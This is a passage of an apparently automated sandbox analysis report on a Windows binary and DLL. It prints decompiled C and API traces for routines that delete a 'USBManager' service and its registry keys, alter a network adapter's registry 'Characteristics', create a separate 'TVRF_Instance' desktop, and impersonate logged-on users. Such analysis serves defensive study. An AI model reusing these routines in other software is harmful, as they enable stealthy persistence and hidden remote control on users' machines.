                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$shutdown$CriticalSection$DeleteErrorInitializeLastselectsend
                                                                                                                        • String ID: NC.WriteData.Failed1$ NC.WriteData.Failed3$ NC.WriteData.Failed4$ NC.WriteData.Failed5$writeData.Disconnect$writeData.Error.
                                                                                                                        • API String ID: 2406434119-2506857550
                                                                                                                        • Opcode ID: 3955a94e403a0ae63d72d91036d330615ccc19c61c363e1a1c4cf091b1a697a7
                                                                                                                        • Instruction ID: 9b8cd641ee854a4557a035298ed64e4ee21aab65bacbfc74d2b882a06588e5f0
                                                                                                                        • Opcode Fuzzy Hash: 3955a94e403a0ae63d72d91036d330615ccc19c61c363e1a1c4cf091b1a697a7
                                                                                                                        • Instruction Fuzzy Hash: 8C91DCB090020DEFEF10EFA4C8859EE7BB5BF54344F24805EE645AB290D7399E14CB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B94E7, Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 185COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalInitializeSection_memset
                                                                                                                        • String ID: Vista$W2K$Win2003$Win2008$Win3.11$Win7$Win95$Win98$Win98SE$Win?$WinMe$WinNT$WinXP
                                                                                                                        • API String ID: 1962156645-467695568
                                                                                                                        • Opcode ID: 959177bbf1b5fb6bcfe7fbab9f4edd01d817295b01b4cdc0533454b81baa8c37
                                                                                                                        • Instruction ID: db7eb224f653a959da8366efe4caee1ed58c755f50c0700b446445da0092859c
                                                                                                                        • Opcode Fuzzy Hash: 959177bbf1b5fb6bcfe7fbab9f4edd01d817295b01b4cdc0533454b81baa8c37
                                                                                                                        • Instruction Fuzzy Hash: 3C71A37490514CEEDB04EF55C891BEDB778AF65784F10408EE10567192EF386F08DBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334130, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 75registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334130() {
				char _v248;
				char _v256;
				void* _v260;
				char _v264;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t18;
				void* _t37;
				void* _t38;

				_t11 = E6F333700("USBManager", 1);
				_t38 = _t37 + 8;
				if(_t11 == 0) {
					return _t11;
				}
				if(M6F340544 != 0) {
					_t18 =  *0x6f34047c; // 0xa545e0
					wsprintfA( &_v264, "%s\\%s%c%s", _t18, "svchost", 0, 0x6f33d543);
					_t38 = _t38 + 0x18;
					_v260 = 0;
					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
						RegDeleteValueA(_v260, "USBManager");
						RegCloseKey(_v260);
					}
				}
				_t12 =  *0x6f34047c; // 0xa545e0
				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
				RegDeleteKeyA(0x80000002,  &_v256);
				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6f33d543);
				return RegDeleteKeyA(0x80000002,  &_v248);
			}












                                                                                                                        0x6f33413d
                                                                                                                        0x6f334142
                                                                                                                        0x6f334147
                                                                                                                        0x6f33422f
                                                                                                                        0x6f33422f
                                                                                                                        0x6f33415c
                                                                                                                        0x6f33415e
                                                                                                                        0x6f33417a
                                                                                                                        0x6f33417c
                                                                                                                        0x6f33419d
                                                                                                                        0x6f3341ad
                                                                                                                        0x6f3341b9
                                                                                                                        0x6f3341c4
                                                                                                                        0x6f3341c4
                                                                                                                        0x6f3341ad
                                                                                                                        0x6f3341ca
                                                                                                                        0x6f3341e6
                                                                                                                        0x6f3341fb
                                                                                                                        0x6f334216
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333719
                                                                                                                          • Part of subcall function 6F333700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333725
                                                                                                                          • Part of subcall function 6F333700: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33373D
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33374F
                                                                                                                          • Part of subcall function 6F333700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                          • Part of subcall function 6F333700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                          • Part of subcall function 6F333700: Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                          • Part of subcall function 6F333700: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F3337C0
                                                                                                                        • wsprintfA.USER32 ref: 6F33417A
                                                                                                                        • RegCreateKeyExA.ADVAPI32 ref: 6F3341A5
                                                                                                                        • RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6F3341B9
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3341C4
                                                                                                                        • wsprintfA.USER32 ref: 6F3341E6
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F3341FB
                                                                                                                        • wsprintfA.USER32 ref: 6F334216
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6F334225
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
                                                                                                                        • String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
                                                                                                                        • API String ID: 2810420714-3733378816
                                                                                                                        • Opcode ID: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction ID: 2f59b7d4d38ac84626ff918008f14b1f1464015837a2f811c3e197cbb679d29c
                                                                                                                        • Opcode Fuzzy Hash: 2af24fc87cf750e879305d1b3360cf1f72dafd56b1c51f6fd63cda0596b0a156
                                                                                                                        • Instruction Fuzzy Hash: 2B21E7B3E007A8BBE610DF60CC41FAB37ADEB94719F00850CF65466180E675F518CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004C8071, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 168threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C8078
                                                                                                                        • _memset.LIBCMT ref: 004C80B4
                                                                                                                        • RevertToSelf.ADVAPI32(00000001,00000001,00000001,?,?,000000A8), ref: 004C80CB
                                                                                                                        • _memset.LIBCMT ref: 004C815F
                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(00000001,?,?,000000A8), ref: 004C81EA
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C821A
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C8265
                                                                                                                        Strings
                                                                                                                        • ImpersonateUser: LoadUserProfile failed, xrefs: 004C81B5
                                                                                                                        • ImpersonateUser: GetCurrentUserToken failed, xrefs: 004C811E
                                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C80E4
                                                                                                                        • SeBackupPrivilege, xrefs: 004C8171
                                                                                                                        • ImpersonateUser: ImpersonateLoggedOnUser failed, xrefs: 004C8203
                                                                                                                        • SeRestorePrivilege, xrefs: 004C8185
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CurrentThread_memset$CriticalImpersonateInitializeLoggedRevertSectionSelfUser
                                                                                                                        • String ID: ImpersonateUser: GetCurrentUserToken failed$ImpersonateUser: ImpersonateLoggedOnUser failed$ImpersonateUser: LoadUserProfile failed$ImpersonateUser: RevertToSelf failed$SeBackupPrivilege$SeRestorePrivilege
                                                                                                                        • API String ID: 2442580533-1466847920
                                                                                                                        • Opcode ID: 76841f0a048f3e1c3ad89a4aa9df7d6e94aebd2734ea7ec55061e87b3b8a9547
                                                                                                                        • Instruction ID: 3ca44e481f02f0b0749d78344e7c9914928ca7f834ac87af0ed759489b04262c
                                                                                                                        • Opcode Fuzzy Hash: 76841f0a048f3e1c3ad89a4aa9df7d6e94aebd2734ea7ec55061e87b3b8a9547
                                                                                                                        • Instruction Fuzzy Hash: 915147B4804388AEEB21EF65C886FAE7FB4AF55304F14805EF48557292DB385A44CB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F334300, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 149registrystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334300() {
				char _v264;
				char _v364;
				int _v368;
				int _v372;
				char _v376;
				int _v380;
				int _v384;
				char _v388;
				int _v392;
				int _v396;
				int _v400;
				void* _v404;
				void* _v408;
				int _t49;
				int _t66;
				char* _t68;
				CHAR* _t83;
				int _t90;

				_t68 = M6F340584; // 0x751730
				_t90 = 0;
				_v404 = 0;
				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
					L18:
					return _t90;
				}
				_v396 = 0;
				_v372 = 0;
				_v368 = 0;
				_v384 = 0;
				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
					L17:
					RegCloseKey(_v404);
					goto L18;
				}
				_t49 = _v396;
				if(_t49 <= 0) {
					goto L17;
				}
				_t66 = 0;
				if(_t49 <= 0) {
					L16:
					goto L17;
				} else {
					do {
						_v380 = 0x104;
						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
							goto L14;
						}
						_v408 = 0;
						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
							goto L14;
						}
						_v392 = 1;
						_v400 = 0x64;
						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
							_t83 = M6F3404D8; // 0xa55cd8
							if(lstrcmpiA( &_v364, _t83) == 0) {
								_v400 = 4;
								_v392 = 4;
								_v388 = 0;
								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
									_v376 = 0x89;
									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
										_t90 = 1;
									}
								}
							}
						}
						CloseHandle(_v408);
						if(_t90 != 0) {
							break;
						}
						L14:
						_t66 = _t66 + 1;
					} while (_t66 < _v396);
					goto L16;
				}
			}





















                                                                                                                        0x6f334306
                                                                                                                        0x6f334321
                                                                                                                        0x6f334323
                                                                                                                        0x6f33432f
                                                                                                                        0x6f3344b9
                                                                                                                        0x6f3344c2
                                                                                                                        0x6f3344c2
                                                                                                                        0x6f334355
                                                                                                                        0x6f334359
                                                                                                                        0x6f33435d
                                                                                                                        0x6f334361
                                                                                                                        0x6f33436d
                                                                                                                        0x6f3344ad
                                                                                                                        0x6f3344b2
                                                                                                                        0x00000000
                                                                                                                        0x6f3344b2
                                                                                                                        0x6f334373
                                                                                                                        0x6f334379
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334380
                                                                                                                        0x6f334384
                                                                                                                        0x6f3344ac
                                                                                                                        0x00000000
                                                                                                                        0x6f33438a
                                                                                                                        0x6f334391
                                                                                                                        0x6f3343a8
                                                                                                                        0x6f3343b8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3343d6
                                                                                                                        0x6f3343e2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f334402
                                                                                                                        0x6f33440a
                                                                                                                        0x6f334416
                                                                                                                        0x6f334418
                                                                                                                        0x6f33442c
                                                                                                                        0x6f334441
                                                                                                                        0x6f334445
                                                                                                                        0x6f334455
                                                                                                                        0x6f33445d
                                                                                                                        0x6f334464
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33448c
                                                                                                                        0x6f33446c
                                                                                                                        0x6f33445d
                                                                                                                        0x6f33442c
                                                                                                                        0x6f334496
                                                                                                                        0x6f33449e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a0
                                                                                                                        0x6f3344a1
                                                                                                                        0x00000000
                                                                                                                        0x6f3344ab

                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,00751730,00000000,000F003F,?,770CC740,00000000), ref: 6F334327
                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6F334365
                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 6F3343B0
                                                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,00000000), ref: 6F3343DA
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6F334412
                                                                                                                        • lstrcmpiA.KERNEL32(?,00A55CD8), ref: 6F334424
                                                                                                                        • RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6F334459
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,Characteristics,00000000,00000004,?,00000004), ref: 6F334482
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F334496
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F3344B2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
                                                                                                                        • String ID: Characteristics$ComponentId$d
                                                                                                                        • API String ID: 678791777-1822972205
                                                                                                                        • Opcode ID: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction ID: 72e184dfbda02b7c6a03d0ee0fae8ea8f7c766a2a20a2d99791d41e314ad56d3
                                                                                                                        • Opcode Fuzzy Hash: 31d82e66935873b71812a413b74a5c9315cf185cd1fafc2d6f0e27d70917d8e5
                                                                                                                        • Instruction Fuzzy Hash: 8751E0B2608395AFD320DF55D884EABBBFDFBC9B14F00491DB68596104E772E5098B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A130, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 72threadsleepsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E6F33A130(void* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t5;
				struct HDESK__* _t7;
				struct HDESK__* _t13;
				void* _t15;

				if( *0x6f34027c < 6 || M6F340544 != 0 || M6F340548 == 0) {
					if(_a4 == 0) {
						return _t5;
					} else {
						_a4 = 1;
						_t7 = GetThreadDesktop(GetCurrentThreadId());
						 *0x6f340484 = _t7;
						if(_t7 != 0) {
							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
							 *0x6f340480 = _t7;
							if(_t7 != 0) {
								_t15 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
								if(_t15 != 0) {
									WaitForSingleObject(_t15, 0xffffffff);
									CloseHandle(_t15);
									Sleep(0xfa0);
								}
								_t13 =  *0x6f340480; // 0x0
								return CloseDesktop(_t13);
							}
						}
						return _t7;
					}
				} else {
					_push(__edi);
					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
					__edi = __eax;
					if(__edi == 0) {
						L12:
						_pop(__edi);
						return __eax;
					}
					if(GetLastError() == 0xb7) {
						__eax = CloseHandle(__edi);
						goto L12;
					}
					__eax = GetCurrentThreadId();
					__eax = GetThreadDesktop(__eax);
					__ebx = CloseHandle;
					 *0x6f340484 = __eax;
					if(__eax != 0) {
						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
						 *0x6f340480 = __eax;
						if(__eax != 0) {
							__eax = _a4;
							_push(__esi);
							__esi = CreateThread(0, 0, E6F339D10, _a4, 0, 0);
							if(__esi != 0) {
								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
								Sleep(0xfa0);
							}
							__ecx =  *0x6f340480; // 0x0
							__eax = CloseDesktop(__ecx);
							_pop(__esi);
						}
					}
					__eax = CloseHandle(__edi);
					_pop(__edi);
					return __eax;
				}
			}










                                                                                                                        0x6f33a137
                                                                                                                        0x6f33a212
                                                                                                                        0x6f33a184
                                                                                                                        0x6f33a218
                                                                                                                        0x6f33a218
                                                                                                                        0x6f339bd7
                                                                                                                        0x6f339bdd
                                                                                                                        0x6f339be4
                                                                                                                        0x6f339bf8
                                                                                                                        0x6f339bfe
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c20
                                                                                                                        0x6f339c24
                                                                                                                        0x6f339c29
                                                                                                                        0x6f339c30
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c41
                                                                                                                        0x00000000
                                                                                                                        0x6f339c4e
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c4f
                                                                                                                        0x6f339c4f
                                                                                                                        0x6f33a157
                                                                                                                        0x6f33a157
                                                                                                                        0x6f33a163
                                                                                                                        0x6f33a169
                                                                                                                        0x6f33a16d
                                                                                                                        0x6f33a183
                                                                                                                        0x6f33a183
                                                                                                                        0x00000000
                                                                                                                        0x6f33a183
                                                                                                                        0x6f33a17a
                                                                                                                        0x6f33a17d
                                                                                                                        0x00000000
                                                                                                                        0x6f33a17d
                                                                                                                        0x6f33a186
                                                                                                                        0x6f33a18d
                                                                                                                        0x6f33a193
                                                                                                                        0x6f33a199
                                                                                                                        0x6f33a1a0
                                                                                                                        0x6f33a1b4
                                                                                                                        0x6f33a1ba
                                                                                                                        0x6f33a1c1
                                                                                                                        0x6f33a1c3
                                                                                                                        0x6f33a1c7
                                                                                                                        0x6f33a1dc
                                                                                                                        0x6f33a1e0
                                                                                                                        0x6f33a1ec
                                                                                                                        0x6f33a1f3
                                                                                                                        0x6f33a1f3
                                                                                                                        0x6f33a1f9
                                                                                                                        0x6f33a200
                                                                                                                        0x6f33a206
                                                                                                                        0x6f33a206
                                                                                                                        0x6f33a1c1
                                                                                                                        0x6f33a208
                                                                                                                        0x6f33a20b
                                                                                                                        0x6f33a20c
                                                                                                                        0x6f33a20c

                                                                                                                        APIs
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,770CF930,6F33A2BE,00000001,?,?,?,?,?,?), ref: 6F33A163
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6F33A16F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F33A17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33A186
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A18D
                                                                                                                        • CreateDesktopA.USER32 ref: 6F33A1B4
                                                                                                                        • CreateThread.KERNEL32 ref: 6F33A1D6
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6F33A1E5
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A1EC
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6F33A1F3
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6F33A200
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6F33A208
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 2944326888-3589830093
                                                                                                                        • Opcode ID: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction ID: bac5d0e4c9355bf7b1ac25f67ff437522f8d4f87fd77d88c8d8bfccc3d769250
                                                                                                                        • Opcode Fuzzy Hash: eedc57a1382bf668ba28d078a0f19c4b8f1f075d3e072cac6b6d4a3e601bec31
                                                                                                                        • Instruction Fuzzy Hash: 1021C077A45BA6ABEF60EB249C48F99376EEB43731F10020DF521952C0CB79E460DA25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004E1281, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 243COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E128F
                                                                                                                          • Part of subcall function 0050E92E: __EH_prolog3.LIBCMT ref: 0050E935
                                                                                                                          • Part of subcall function 0050E764: __EH_prolog3.LIBCMT ref: 0050E76B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1847: __EH_prolog3_GS.LIBCMT ref: 004A184E
                                                                                                                          • Part of subcall function 004A1847: InitializeCriticalSection.KERNEL32(?,00000028,004BF6CE,?,00000000,00784028,00000000), ref: 004A1863
                                                                                                                          • Part of subcall function 004A1847: _swprintf.LIBCMT ref: 004A1881
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
